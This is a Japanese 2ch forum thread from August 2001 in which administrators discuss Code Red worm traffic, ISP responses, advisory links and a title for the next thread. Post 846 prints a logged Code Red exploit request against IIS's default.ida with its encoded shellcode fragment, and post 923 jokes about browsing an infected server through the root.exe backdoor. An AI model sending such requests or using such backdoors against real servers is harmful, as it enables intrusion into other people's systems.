見ていたよ。ちょっと時間差(local proxyのTTLが5分ごとだから)で
変なレスになっちゃった。

>>754
もしかして、新しい2ch用語誕生か?
760名無しさん@お腹いっぱい。:2001/08/13(月) 23:32
みな、しっかりしろ、ここはおかずスレじゃないんだ。
761名無しさん@お腹いっぱい。:2001/08/13(月) 23:33
コードレットたん、ハァハァ
762だって夜だぜ:2001/08/13(月) 23:38
>>760 スマソ
来るだけで いい加減 飽きました。
何かCodeチャンと遊びたいんですが。
6日〜12日のApacheのLogは3.7MB越えとります。どうするのやら。

反省汁ださしたろか!
      ブニュブニュ
763え〜ん:2001/08/13(月) 23:40
今度反省汁で作ってイイ?
764名無しさん@お腹いっぱい。:2001/08/13(月) 23:40
code redがくると鳴る風鈴でも作れば、涼しくなるし
楽しめるよ。
765名無しさん@お腹いっぱい:2001/08/13(月) 23:47
code redが来るとメールを送るスクリプトを組んでみた。
とりあえず自分宛てに送信。数分後。40通のメールが届きました(藁
なんて恐ろしい。
766名無しさん@お腹いっぱい。:2001/08/13(月) 23:48
>>763
顔にかかっているヤツきぼーん。
767名無しさん@お腹いっぱい。:2001/08/13(月) 23:51
次回のスレタイトルでも使うか?
反省汁。
768名無しさん@お腹いっぱい。:2001/08/13(月) 23:56
code red 反省汁、顔にかけてー
って、なんじゃそりゃ。
769名無しさん@お腹いっぱい。:2001/08/14(火) 00:00
code red 反省汁、中田氏するな
770名無しさん@お腹いっぱい。:2001/08/14(火) 00:03
コードレッド(CodeRed)いいかげん反省汁!
771名無しさん@お腹いっぱい。:2001/08/14(火) 00:05
なぜ、写真一枚でここまで動揺してしまうんだ(笑)
上の方のパッチをあてても感染してしまうというのが気になったが
本人はラーメン食いにいったまんま帰って来ないね。
772名無しさん@お腹いっぱい。:2001/08/14(火) 00:07
まだまだ逝きてます!コードレッド(Code Red)
773名無しさん@お腹いっぱい。:2001/08/14(火) 00:09
code red 鎮まれ! Yahoo! BBスレは沈まれ!
774名無しさん@お腹いっぱい。:2001/08/14(火) 00:11
ねえん、新種はまだなのぉ?コードレッド(Code Red)
775名無しさん@お腹いっぱい。:2001/08/14(火) 00:12
滅亡予定日まで一ヶ月半・・・コードレッド(Code Red)
776え〜ん:2001/08/14(火) 00:12
新種出していい?
777だって夜だぜ:2001/08/14(火) 00:13
では上記の経過から反省汁は2ch用語として登録されました。
語源はバカの一言”反省しる”から来てますので 読みは ”はんせいしる”で
行きたいですが、”ジル”でも可とします。
広く、汁物の呼称でも構いませんが、反省させる、する、の誤用系でも
オーケという意見も採り入れ、ケースバイケースで応用するということです。
778名無しさん@お腹いっぱい。:2001/08/14(火) 00:15
>>776
お茶目でキュートで、五十嵐先生みたいな奴にしてね。
779名無しさん@お腹いっぱい。:2001/08/14(火) 00:16
新種出す前に、
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=3067
の動作を確認してみて欲しいな。
780名無しさん@お腹いっぱい。:2001/08/14(火) 00:16
781名無しさん@お腹いっぱい。:2001/08/14(火) 00:16
あれ?そういえば、しみじみ君は?
782名無しさん@お腹いっぱい。:2001/08/14(火) 00:18
783名無しさん@お腹いっぱい。:2001/08/14(火) 00:22
反省汁よ
784え〜ん:2001/08/14(火) 00:27
785名無しさん@お腹いっぱい。:2001/08/14(火) 00:28
しみじみ騙っていいですか?
786え〜ん:2001/08/14(火) 00:28
>>779
カクニンシタヨ
オヤスミ
787名無しさん@お腹いっぱい。:2001/08/14(火) 00:28
code red , MSの後門(back GATES)をアタック
788名無しさん@お腹いっぱい。:2001/08/14(火) 01:02
最初は面白がって「どんどんログがたまるぜ」とかいってたんだけどさ、
おんなじホストから毎日攻撃を受けると段々腹が立ってくるわけよ.
そろそろ連絡してやった方がいいのかなあ
789名無しさん@お腹いっぱい。:2001/08/14(火) 01:07
某ADSL系ISPからの返事

>お問い合わせの件ですが、
>該当のユーザーには注意を行いました。
>
>今後も宜しくお願いいたします。
790名無しさん@お腹いっぱい。:2001/08/14(火) 01:18
今頃、co.jpから来た・・・
なんとまぁ
791 :2001/08/14(火) 01:22
interQから、今日、大量に来ました。
どうなってるんですか?
792名無しさん@お腹いっぱい。:2001/08/14(火) 01:34
全国各地からmeshがしぶとくやってきます。
793名無しさん@お腹いっぱい。:2001/08/14(火) 01:36
>>789
InterQはなんの返事も無いよ。
794名無しさん@お腹いっぱい。:2001/08/14(火) 01:44
>>793
CCに[email protected] を入れて、返事を求めてみては?
795名無しさん@お腹いっぱい。:2001/08/14(火) 01:48
>>778
「イオナ」?>五十嵐先生
796名無しさん@お腹いっぱい。 :2001/08/14(火) 01:51
7割 韓国
2割 日本
1割 その他(中国)

つー感じかな。
パッチの宛て方もわからんのかね・・・・。
797 :2001/08/14(火) 02:13
Code Red III. This time its not a joke,
A third version of the Code Red worm exits on the internet
as was reported by companies in Korea
The worm mainly spreads there (Korea etc.) and not out of
it till now it infected already 43,000 IIS servers.


ネタかなー。ソース違うのかなー。
798名無しさん@お腹いっぱい。:2001/08/14(火) 02:16
>>797
過去スレで、コードレッド2の誤認識(別名)という結論になっていたが、
何時のソース?
799名無しさん@お腹いっぱい。:2001/08/14(火) 02:25
 なんだかんだ言って今のワームって地味だよな。
「ワルキューレの騎行」かなんか鳴らしながらwin2k
uninstallしてさ、代わりにOS/2あたりを入れていく
ワームが出てくると嬉しいんだけどな
800797:2001/08/14(火) 02:32
>>798
当てになるかわからないけど某ウイルスサイトの今日付けのニュースに張って有った。
google、CodeRedIIIで検索すると一応引っかかるんだけど、詳細今一わからない。
>誤認識って結論も有ったのね。。。

どうも、オランダで開催されたHAL 2001ってハッキングイベントに作者来てたんじ
ゃね−かって噂も書いてあった。29AってチームがボードにRedWormについてのメッ
セージ残してったらしい。

スマソ797のネタ元リンク貼れない。一度つぶれかけたとこだし。
バイナリファイルでもアップされれば比較できそうだけど。
801名無しさん@お腹いっぱい。:2001/08/14(火) 03:06
まあ、何はともあれ、code redのおかげであぁ、世界は繋がってるんだ
と、実感できて良い事だ。
802名無しさん@お腹いっぱい。:2001/08/14(火) 03:16
そろそろまとめの時期なのか?
803名無しさん@お腹いっぱい。:2001/08/14(火) 04:03
IIS5でパッチを当ててあるのに
トレンドマイクロの駆除ツールに、CodeRedII発見!
と言われて不安な人は、とりあえず、
http://www.ipa.go.jp/security/ciadr/vul/checkcoderedII.html#infection
の確認をしてみたら安心出来るかもしれない。
804名無しさん@お腹いっぱい。:2001/08/14(火) 06:51
あの・・なんか
http://www.security.nl/misc/codered-stats/
増えてるようにも見えげ。
「赤虫だもんそれくらいふつー」なのか?
805名無しさん@お腹いっぱい。:2001/08/14(火) 07:05
>>799
地味なワームだからTVニュースでいい画が流せない、
結局もっと視聴率が取れるいい画が付いたゴミニュースしか流さんのが最近のマスコミ。
806名無しさん@お腹いっぱい。:2001/08/14(火) 07:17
root.exe使った改竄の様子でも流せば数字取れそう
807名無しさん@お腹いっぱい。:2001/08/14(火) 07:17
取りあえず最高のセキュリティ対策はM$を斬ることだね。
808名無しさん@お腹いっぱい。:2001/08/14(火) 07:22
>>804 うを、久しぶりに見たらページがかっこよくなってんだけど
809名無しさん@お腹いっぱい。:2001/08/14(火) 08:34
トレンドマイクロの駆除ツールって
こっそりバージョンアップしてるから気をつけたほうがいいよ。
初期のやつはヘタレでご認識しまくり
810怒り:2001/08/14(火) 08:42
こんな時期に、全社一斉お盆休みとか言って、サポートも
一切受け付けず、まったりとしているプロバイダーなんか、
逝ってよし。

ユーザーじゃなくて、あんたんとこのサーバが、やられ
ちゃってるんだよ!!!
811名無しさん@お腹いっぱい。:2001/08/14(火) 08:42
この盆はアレだな、鯖供養と赤虫供養の灯篭がぞろぞろ・・・
812名無しさん@お腹いっぱい。:2001/08/14(火) 09:02
8/4以降まったく来てなかったNNN…が来たよー。
NNN付きのサーバってXXXには寄生されないの?
813名無しさん@お腹いっぱい。:2001/08/14(火) 09:21
>>812
されます
814名無しさん@お腹いっぱい:2001/08/14(火) 09:39
そろそろ次スレの準備スレ。
ぱーと4か?
815名無しさん@お腹いっぱい。:2001/08/14(火) 09:41
>>813
そうなのですか。
816名無しさん@お腹いっぱい:2001/08/14(火) 09:42
次スレの準備汁!!(やっと使えた)
817名無しさん@お腹いっぱい:2001/08/14(火) 09:44
>>812
XXXを送ってきた鯖(海外)をちょっと覗いたらNNNにも感染した形跡をみた事は幾度かあった。
818名無しさん@お腹いっぱい。:2001/08/14(火) 09:49
>>816
次スレですか。
ラジャー。
819818:2001/08/14(火) 10:03
緊急トラブルにて現在iモードより。
戦線離脱許可願う。
各自独断専行を許可する。
820名無しさん@お腹いっぱい。:2001/08/14(火) 10:03
>>814
パート5じゃない?
821え〜ん:2001/08/14(火) 10:11
822811:2001/08/14(火) 10:19
>え〜んさま
わ〜ん 感動だぁ〜〜
823え〜ん:2001/08/14(火) 10:25
あそこの画像すぐ流れちゃうんダヨ
www.nefty.net/desktop/haritsuke/img-box/
今のうちヒロタホウガイイヨ
824名無しさん@お腹いっぱい。:2001/08/14(火) 10:25
825811:2001/08/14(火) 10:37
>>823
ぜんぶ拾ってマスがな〜

>>824
なんじゃコリァ・・
826えが:2001/08/14(火) 10:46
これまでの減少傾向とはあきらかに違うグラフの動き
新種だろうか?
http://www.security.nl/misc/codered-stats/
827名無しさん@お腹いっぱい。:2001/08/14(火) 10:47
www.tk.ac.kr[210.106.88.2]から送られて来てるんですが
どうしたらいいですかね?
828西屁プすむ:2001/08/14(火) 10:51
XXXXXXXXXやNNNNNNNNNのCodeRedアクセスが
落ち着いたカナと思ったら今度は

203.246.81.170 - - [14/Aug/2001:05:42:19 +0900] "-" 408 -
203.239.134.29 - - [14/Aug/2001:06:10:24 +0900] "-" 408 -
203.67.241.128 - - [14/Aug/2001:06:38:14 +0900] "-" 408 -
203.248.129.50 - - [14/Aug/2001:06:56:09 +0900] "-" 408 -
203.73.165.36 - - [14/Aug/2001:07:08:03 +0900] "-" 408 -
203.144.224.240 - - [14/Aug/2001:07:10:54 +0900] "-" 408 -
203.241.197.125 - - [14/Aug/2001:07:44:04 +0900] "-" 408 -
203.239.58.193 - - [14/Aug/2001:10:17:01 +0900] "-" 408 -
203.224.27.176 - - [14/Aug/2001:10:19:56 +0900] "-" 408 -
203.227.37.239 - - [14/Aug/2001:10:21:53 +0900] "-" 408 -

なんですけど、これって何?
829名無しさん@お腹いっぱい。:2001/08/14(火) 10:53
ie6ですがクッキーはどうすればonになるのですか?
830名無しさん@お腹いっぱい。:2001/08/14(火) 11:09
>>828
俺のとこは、24時間前からほとんどそれだよ
831西屁プすむ:2001/08/14(火) 11:15
>>830
そうっすか。
新種ですかね。
832名無しさん@お腹いっぱい。:2001/08/14(火) 11:29
しかし、
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/tools/redthree.asp
に関する続報って、ないのかいな?

日本語の情報で触れられているのはこれぐらいしか見つからないし。
どうなってんのよ。
http://www.zdnet.co.jp/enterprise/0108/10/01081002.html
833え〜ん:2001/08/14(火) 11:31
一応サイト上にgifマトメタヨ
ちなみに、ディレクトリ探してもナニモデナイヨ
http://isweb24.infoseek.co.jp/computer/titikun/index.html
834名無しさん@お腹いっぱい:2001/08/14(火) 11:38
>>833
ページが見つかりません。
だとよ。
835名無しさん@お腹いっぱい。:2001/08/14(火) 11:40
コンナン、ミツケタヨ
http://www3.airnet.ne.jp/codered/
836名無しさん@お腹いっぱい。:2001/08/14(火) 11:43
>>835
既出
837え〜ん:2001/08/14(火) 11:49
>>834
ふざけすぎた
10秒待つか、右の青棒の中にリンクアルヨ
838名無しさん@お腹いっぱい。:2001/08/14(火) 11:53
>>837
時々見かける手だね
ふざけてなんかいないよ。
839名無しさん@お腹いっぱい。:2001/08/14(火) 11:54
>>837
え〜んさんは楽しい人だね。
840名無しさん@お腹いっぱい。:2001/08/14(火) 11:59
>>837
センスは変だけどね。
841え〜ん:2001/08/14(火) 12:08
>>840
ニヤリ
842名無しさん@お腹いっぱい:2001/08/14(火) 12:08
>>837
え〜んさん、ゴメンネ。ちゃんとありました。
ありがと。
843名無しさん@お腹いっぱい。:2001/08/14(火) 13:24
>>841
 喜んでるし....
844名無しさん@お腹いっぱい。:2001/08/14(火) 13:36
今回Win9X系が無害だったことは不幸中の幸いだな。
M$は今回の教訓を元にコンシューマ専用OSを絶対に作れ、全世界の管理者のために。
845名無しさん@お腹いっぱい。:2001/08/14(火) 13:40
Win2kで9x系の統合に失敗して良かったね。
846cx君:2001/08/14(火) 13:59
210.94.172.193 - - [13/Aug/2001:04:05:18 +0900]
"GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 271
847cx君:2001/08/14(火) 14:02
210.244.220.131 - - [13/Aug/2001:04:14:39 +0900] "GET /default.ida?XXXXXXXX
210.117.4.11 - - [13/Aug/2001:04:15:39 +0900] "GET /default.ida?XXXXXXXXXX
210.205.242.251 - - [13/Aug/2001:04:21:53 +0900] "GET /default.ida?XXXXXXX
210.113.65.103 - - [13/Aug/2001:04:36:57 +0900] "GET /default.ida?XXXXXXXXXXX
210.241.251.58 - - [13/Aug/2001:04:39:58 +0900] "GET /default.ida?XXXXXXXXXX
210.124.29.200 - - [13/Aug/2001:04:40:21 +0900] "GET /default.ida?XXXXXXXXXX
210.91.196.69 - - [13/Aug/2001:04:44:46 +0900] "GET /default.ida?XXXXXXXXXX
210.91.108.101 - - [13/Aug/2001:04:49:38 +0900] "GET /default.ida?XXXXXXXXX
210.182.140.17 - - [13/Aug/2001:05:10:30 +0900] "GET /default.ida?XXXXXXXXXXX
210.225.48.83 - - [13/Aug/2001:18:16:32 +0900] "GET /default.ida?XXXXXXXX
210.99.213.5 - - [13/Aug/2001:18:38:00 +0900] "GET /default.ida?XXXXXXXXXXXX
210.181.198.227 - - [13/Aug/2001:18:38:56 +0900] "GET /default.ida?XXXXXX
210.125.198.67 - - [13/Aug/2001:18:39:39 +0900] "GET /default.ida?XXXXXXXXXXX
210.165.122.53 - - [13/Aug/2001:18:40:12 +0900] "GET /default.ida?XXXXXXXXXXX
210.106.188.215 - - [13/Aug/2001:18:43:01 +0900] "GET /default.ida?XXXXXXXX
210.178.122.139 - - [13/Aug/2001:18:48:10 +0900] "GET /default.ida?XXXXXXXXXX
210.178.122.139 - - [13/Aug/2001:18:48:11 +0900] "GET /default.ida?XXXXXXX
210.178.122.139 - - [13/Aug/2001:18:49:15 +0900] "GET /default.ida?XXXXXXXXXXX
210.124.169.120 - - [13/Aug/2001:19:02:13 +0900] "GET /default.ida?XXXXXXXXXX
210.90.239.200 - - [13/Aug/2001:19:02:30 +0900] "GET /default.ida?XXXXXXXXX
210.125.121.140 - - [13/Aug/2001:19:04:35 +0900] "GET /default.ida?XXXXXXX
210.183.245.243 - - [13/Aug/2001:20:44:31 +0900] "GET /default.ida?XXXXXXXXXXXX
848名無しさん@お腹いっぱい。:2001/08/14(火) 14:03
えーん氏ギャラリー、髪金サン追加されてるし・・・
849名無しさん@お腹いっぱい。:2001/08/14(火) 14:23
EVERYDAY PEOPLEさんは、うまいときに夏休みに入ったね
850え〜ん:2001/08/14(火) 14:32
サイトはゲリラ的に更新
いまそれどころじゃないんだYO
メインPCイチャタヨ(サブノート使いづらい)
BIOSリセットも聞かない
しばらく倍茶
851名無しさん@お腹いっぱい。:2001/08/14(火) 14:52
ユーザー認証突破してこんなの来た。
61.182.241.48 - - [14/Aug/2001:07:41:22 +0900] "X〜〜X ?????? HTTP/1.0" 400 178
なんなんだコイツは?

ちなみに今までのCodeRedだと
61.143.127.207 - - [14/Aug/2001:14:38:58 +0900] "GET /default.ida HTTP/1.0" 401 313
こんな感じ。
852名無しさん@お腹いっぱい。:2001/08/14(火) 15:18
ときおり、おなじipアドレスからXXXXの30連発食らうんだが
これって変種なのか?それとも感染したIISの設定が変なのか?
853名無しさん@お腹いっぱい。:2001/08/14(火) 15:25
複数の社内向けIISが感染して、そいつらがNAT通って外へクラックかけてるんじゃないの
854名無しさん@お腹いっぱい。:2001/08/14(火) 15:29
推定台数10台から30台ってことか。
855名無しさん@お腹いっぱい。:2001/08/14(火) 15:29
32タテ食らう事もあるそーです。邪悪ねぇ。
856 :2001/08/14(火) 15:35
いんたーりんくが、こんな事言ってるんですけど、、、
これって、オバカユーザの多さ、自分の無能さ、基幹の貧弱さを
暴露してるモード?

首相官邸へ提言 トロイの木馬型ウィルス「CodeRed」対策を求める
http://www.interlink.or.jp/notification/backno/2001/info012.html
857名無しさん@お腹いっぱい。:2001/08/14(火) 15:38
うちも 20 連くらいのがあった。数秒間隔。

でもいくら NAT だからって、1 つの IP に揃ってリクエストっ
ていうのは、あり得ないような気がする。あれってランダムに
ターゲットの IP つくるんだよね。

Code Red の真似した別物とかって無いの?
858名無しさん@お腹いっぱい。:2001/08/14(火) 15:38
逝ってよいよ?いんたーりんく。お盆だしね。ホネくらい拾ーてやる。(W
859名無しさん@お腹いっぱい。:2001/08/14(火) 15:38
官邸へのSPAM依頼だね(笑)
860名無しさん@お腹いっぱい。:2001/08/14(火) 15:40
自分のみは自分で守る。
出る時は厳密に、来る物には寛容に。
って言うインターネット文化はもう古典?
861名無しさん@お腹いっぱい。:2001/08/14(火) 15:42
>>857
そんな風に期待するけど、タコNATだとあんまりランダムに振ってくれない
し、社内PROXYも利用してたりして。
862名無しさん@お腹いっぱい。:2001/08/14(火) 15:48
え〜ん氏ダイジョブかな?
863名無しさん@お腹いっぱい。:2001/08/14(火) 15:55
すげー素朴なこと書いてる気もしますが、
NAT router の中の IIS が感染した場合、そこから攻撃をばらまく先は
192.*.*.* になる、ということはないのでしょうか。
864名無しさん@お腹いっぱい:2001/08/14(火) 15:56
インターリンクって救い様の無いバカだな。
865名無しさん@お腹いっぱい。:2001/08/14(火) 16:01
>>864
赤虫はニンゲンにも伝染るんですね。(w
866名無しさん@お腹いっぱい:2001/08/14(火) 16:02
いんたーりんくは自分らの顧客の質が低いから何とかしてくれと
言いたいのか (w
867名無しさん@お腹いっぱい。:2001/08/14(火) 16:05
>>863
680君お帰りぃ
868名無しさん@お腹いっぱい。:2001/08/14(火) 16:13
http://www.interlink.or.jp/notification/backno/2001/info012.html
> 現在、当社は「コードレッドバスター」という機器を開発中です。これは外部からの 「CODE RED」を
> 除去する装置です。
CodeRedの裏口使って外部マシンを修正する機器だったりしてな。
869名無しさん@お腹いっぱい。:2001/08/14(火) 16:14
>>856
...アホや。インターリンク。他国に対し技術支援だぁ?
元々安かろう悪かろうなプロバイダが何ゆーとるかね(笑)
870名無しさん@お腹いっぱい。:2001/08/14(火) 16:15
あれでしょ、きっと「ナントカ銃」でクロスふぁいあ〜すると
赤虫が実体化するのでそこをみんなでボコると。
871名無しさん@お腹いっぱい。:2001/08/14(火) 16:17
http://www.npa.go.jp/hightech/notice/notice.htm
ここは、M$ではありません。(w
872名無しさん@お腹いっぱい。:2001/08/14(火) 16:18
>>853
ああ、そうか思いつかなかった サンクス
少なくともkrの2箇所から30連発(以上)食らっているけど
LAN内のサーバなら活動タイミングが(ほぼ)一致していても
不思議はないな


しかし、インターリンク面白過ぎ
> 現在、当社は「コードレッドバスター」という機器を開発中です。これは外部からの 「CODE RED」を
>除去する装置です。
873名無しさん@お腹いっぱい。:2001/08/14(火) 16:19
interlinkが戦争の火蓋を開くわけね。
874名無しさん@お腹いっぱい。:2001/08/14(火) 16:27
開発が終わる頃にはCodeRedが沈静化する仕組みナリ。
875名無しさん@お腹いっぱい。:2001/08/14(火) 16:30
>>871
もしホントにM$なら:

その機能を検証した結果、
  ア  自己を他のサーバに複写しこれを繰り返す機能
  イ  バックドアを作成する機能
  逝ク そのまんまです
を有しており、ほっとけばなんとかなるので騒ぎすぎたらだめヨ。
なお数ヵ月後に大量のカッコーがわらわらと出て来るでしょうが
そんなの漏れたちの知ったこっちゃない。
いや〜今日もニホンは平和平和。あ、コイズミ君、かき氷ボクにも。(藁
876名無しさん@お腹いっぱい。:2001/08/14(火) 16:36
すごいな〜interlink
入会せねば〜
877え〜ん:2001/08/14(火) 16:36
>>862
心配してくれてアリガト・・バラシて掃除して組み立てたヨ
ヨカッタ新スレまでに間に合った。

インターリンクのバックドアをごにょごにょするのかな。
ちょっと興味あり。
878名無しさん@お腹いっぱい。:2001/08/14(火) 16:42
掃除して直るパソっていったい・・・
879名無しさん@お腹いっぱい。:2001/08/14(火) 16:45
そろそろ新スレかあ。
動きが無いからタイトルにも困るね。
880sage:2001/08/14(火) 16:47
あ、え〜んさん。無事でヨカタ
881名無しさん@お腹いっぱい。:2001/08/14(火) 16:50
interlinkもニンマリ コードレッド(CodeRed)
882名無しさん@お腹いっぱい。:2001/08/14(火) 16:53
コードレッド(code red)除去装置絶賛開発中 by Interlink
長いな。
883名無しさん@お腹いっぱい。:2001/08/14(火) 16:54
コードレッド(code red)除去装置は間に合うのか?Code red自滅まであと一月半
884名無しさん@お腹いっぱい。:2001/08/14(火) 16:54
コードレッド(Code Red)特需だ! by In(以下略)
885名無しさん@お腹いっぱい。:2001/08/14(火) 16:56
interlink反省汁 コードレッド(Code Red)
886名無しさん@お腹いっぱい。:2001/08/14(火) 17:00
もめろ!コート゛レッツ゛!!(CodeRed)
887え〜ん:2001/08/14(火) 17:01
コードレッド感染汁(よくとぶぜ)
888しみじみクン:2001/08/14(火) 17:09
ところで…変な時間に…
しみじみ述べていいですか…

お盆休みが明日まで、という方も多いと思います。か
くいう私もそうですが、この休み中の課題(自宅鯖建
立)達成のため、なかなかここには来れませんでした
…というか、串経由(エッチチャットで自宅鯖のIPがで
るとヤなんで串さしてます)なんでここに入れてもら
えなかったんですけどね…

自宅鯖のhttpd-errorログにも、日に2、30件は残って
ますね(FreeBSD鯖)…今日明日じゅうにNT4.0でASP
鯖を立てる予定なんですが…不安です不安です不
安です…

そろそろこのねたもつきたんじゃあないですか。でも
今回の騒動で皆さん一番感じられたのは、どなたか
おっしゃってましたし既出ですが「インターネットが常
に世界とつながっているということの実感」なのでは
ないですか…

ああ、TCP/IPってオソロシイ…誰が作ったンダロウ…
889名無しさん@お腹いっぱい。:2001/08/14(火) 17:11
だんだん洗練(?)されてきてる 1 だけど、いまだに index service
止めれば大丈夫とかほざくのがいたので、

「インデックスサービスを停止しても感染予防になりません」

の1行を次回 1 に加えるのきぼ〜ん。
890名無しさん@お腹いっぱい。:2001/08/14(火) 17:28
891名無しさん@お腹いっぱい。:2001/08/14(火) 17:39
結局どうゆう仕組みなんだ?
コードレッドパスタ
892名無しさん@お腹いっぱい。:2001/08/14(火) 17:48
>>891 ワラタ
893名無しさん@お腹いっぱい。:2001/08/14(火) 18:03
1は

.∧_∧  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\
( ´∀`)< お前らまだやってんのかよ   |
.       \____________/

優良スレはまだまだ続く  CodeRed スレ Part5.
ひょっとして 9/30 まで続くのか?
まもなく新しい亜種が登場する? 基本はマターリでお願いします。

〓〓〓 WindowsNT4.0/2000 ユーザーはチェックしよう 〓〓〓
1.インデックスサービスを停止しても感染予防になりません
2.ログオンして Ctrl-Alt-Del を押す
3.「プロセス」タブを選択する
4.Inetinfo.exe プロセスを探す
5.見つかった人で、ちゃんと対策済みと自信を持って言える人以外は
  すぐに↓をチェック!
 http://ton.2ch.net/test/read.cgi?bbs=sec&key=997427742
さらに前↓
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997283377
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997150588
http://ton.2ch.net/test/read.cgi?bbs=sec&key=996563662

リンク集は >>2
894名無しさん@お腹いっぱい。:2001/08/14(火) 18:04
2はこう?

とりあえずここを読め!
Code Red (主にII) 関係のリンク

IPA:「Code Red ワームに関する情報」
http://www.ipa.go.jp/security/ciadr/vul/20010727codered.html

マイクロソフト:対処方法
http://www.microsoft.com/japan/technet/security/codealrt.asp

橋本 喜代太氏:Code Red II についての警告
http://www.reasoning.org/jp/security_alerts/hashsa-2001-02.html

オランダでの観測と、東アジア爆発の中心
http://www.security.nl/misc/codered-stats/
http://jove.prohosting.com/~wingtxt/source/nakasu121.jpg

首相官邸へ提言 トロイの木馬型ウィルス「CodeRed」対策を求める
http://www.interlink.or.jp/notification/backno/2001/info012.html



何か抜けてるかチェックしてくれ
895名無しさん@お腹いっぱい。:2001/08/14(火) 18:05
896名無しさん@お腹いっぱい:2001/08/14(火) 18:06
最後は晒し者か (w
897え〜ん:2001/08/14(火) 18:11
>>895
みんなが気に入ってればいれるよろし
898名無しさん@お腹いっぱい。:2001/08/14(火) 18:12
タイトルは?
899名無しさん@お腹いっぱい。:2001/08/14(火) 18:15
899
900名無しさん@お腹いっぱい。:2001/08/14(火) 18:18
なんせ機器だからな。コードレッドバストゥワー
901え〜ん:2001/08/14(火) 18:18
タイトルどれかな?


881 名前:名無しさん@お腹いっぱい。 投稿日:2001/08/14(火) 16:50
interlinkもニンマリ コードレッド(CodeRed)


882 名前:名無しさん@お腹いっぱい。 投稿日:2001/08/14(火) 16:53
コードレッド(code red)除去装置絶賛開発中 by Interlink
長いな。


883 名前:名無しさん@お腹いっぱい。 投稿日:2001/08/14(火) 16:54
コードレッド(code red)除去装置は間に合うのか?Code red自滅まであと一月半


884 名前:名無しさん@お腹いっぱい。 投稿日:2001/08/14(火) 16:54
コードレッド(Code Red)特需だ! by In(以下略)


885 名前:名無しさん@お腹いっぱい。 投稿日:2001/08/14(火) 16:56
interlink反省汁 コードレッド(Code Red)


886 名前:名無しさん@お腹いっぱい。 投稿日:2001/08/14(火) 17:00
もめろ!コート゛レッツ゛!!(CodeRed)


887 名前:え〜ん 投稿日:2001/08/14(火) 17:01
コードレッド感染汁(よくとぶぜ)
902え〜ん:2001/08/14(火) 18:19
アブね〜901ジャナイカヨ
903名無しさん@お腹いっぱい。:2001/08/14(火) 18:19
>>887をもうちょっとヒネルと良いかも
904名無しさん@お腹いっぱい。:2001/08/14(火) 18:20
新スレ立て中?
905名無しさん@お腹いっぱい。:2001/08/14(火) 18:21
900さんスレ立てOK?
906え〜ん:2001/08/14(火) 18:26
>>903
漏れにはセンスナイ
だれかひねって
907名無しさん@お腹いっぱい。:2001/08/14(火) 18:31
漏らすな!コードレッド感染汁(よくとぶぜ)
908え〜ん:2001/08/14(火) 18:36
>>907
ワラタ
909名無しさん@お腹いっぱい。:2001/08/14(火) 18:40
原点に戻って、
日本政府は反省しるコードレッド(code red)パート5
910え〜ん:2001/08/14(火) 18:40
900さんタイトル待ってるのかな
911名無しさん@お腹いっぱい。:2001/08/14(火) 18:41
コードレッド(code red)パート5 日本政府は反省しる!
912名無しさん@お腹いっぱい。:2001/08/14(火) 18:42
>>911
でいいんじゃない?
913名無しさん@お腹いっぱい。:2001/08/14(火) 18:42
汁か、しる、の問題はあるけど
914名無しさん@お腹いっぱい。:2001/08/14(火) 18:44
がんばれ900。
915え〜ん:2001/08/14(火) 18:45
コードレッド(code red)パート5 日本政府は反省しる!

コードレッド(code red)パート5 日本政府は反省汁

どっち?
!
916え〜ん:2001/08/14(火) 18:46
まちがった

コードレッド(code red)パート5 日本政府は反省しる!

コードレッド(code red)パート5 日本政府は反省汁 !
917名無しさん@お腹いっぱい。:2001/08/14(火) 18:46
後者
918名無しさん@お腹いっぱい。:2001/08/14(火) 18:48
後者やね
919え〜ん:2001/08/14(火) 18:49
あとは900さんにお・ま・か・せ

漏れも後者
920え〜ん:2001/08/14(火) 18:56
もしも〜し 900さん

立ててますか〜?

ここにいるの3人だけだったりして
>>917
>>918
漏れ
921名無しさん@お腹いっぱい。:2001/08/14(火) 18:57
おれ917
もしかして900は書き逃げ?
922え〜ん:2001/08/14(火) 18:58
やっぱり
917さん立てられる?

漏れかちゅーしゃなんよ
923名無しさん@お腹いっぱい。:2001/08/14(火) 18:59
Directory of C:InetPubscripts
/script/root.exe?ほげほげするとこうなるようにしました
2001-06-13 12:42a <DIR> .
2001-06-13 12:42a <DIR> ..
2001-06-24 10:54p 289 eroero.asp
2001-06-24 10:54p 289 ero.htm
2001-06-24 10:54p 289 ero_img.asp
2000-08-26 12:00p 310,544 root.exe
2001-05-31 06:03p <DIR> アニメ_エロ
2001-05-31 06:03p <DIR> SM
2001-05-31 06:03p <DIR> 女子アナお宝画像
2001-05-31 06:03p <DIR> お宝画像
5 File(s) 311,700 bytes
4 Dir(s) 1,778,767,872 bytes free
エロファイル探してくる(w
924名無しさん@お腹いっぱい。:2001/08/14(火) 18:59
ROMならいるぞ。誰か立ててちょ。
925え〜ん:2001/08/14(火) 19:03
ダブルとまたややっこしいからな
926917:2001/08/14(火) 19:06
立てたよ
927名無しさん@お腹いっぱい。:2001/08/14(火) 19:06
928名無しさん@お腹いっぱい。:2001/08/14(火) 19:06
誰もいないの?
立てちゃうよ
929名無しさん@お腹いっぱい。:2001/08/14(火) 19:08
>>928
もう勃ってるよ
930名無しさん@お腹いっぱい。:2001/08/14(火) 19:10
新スレ
コードレッドパート5 日本政府は反省汁
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997783469
931928:2001/08/14(火) 19:10
スマソ

これにて終了
新スレはこちら
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997783469

こちらはsageで
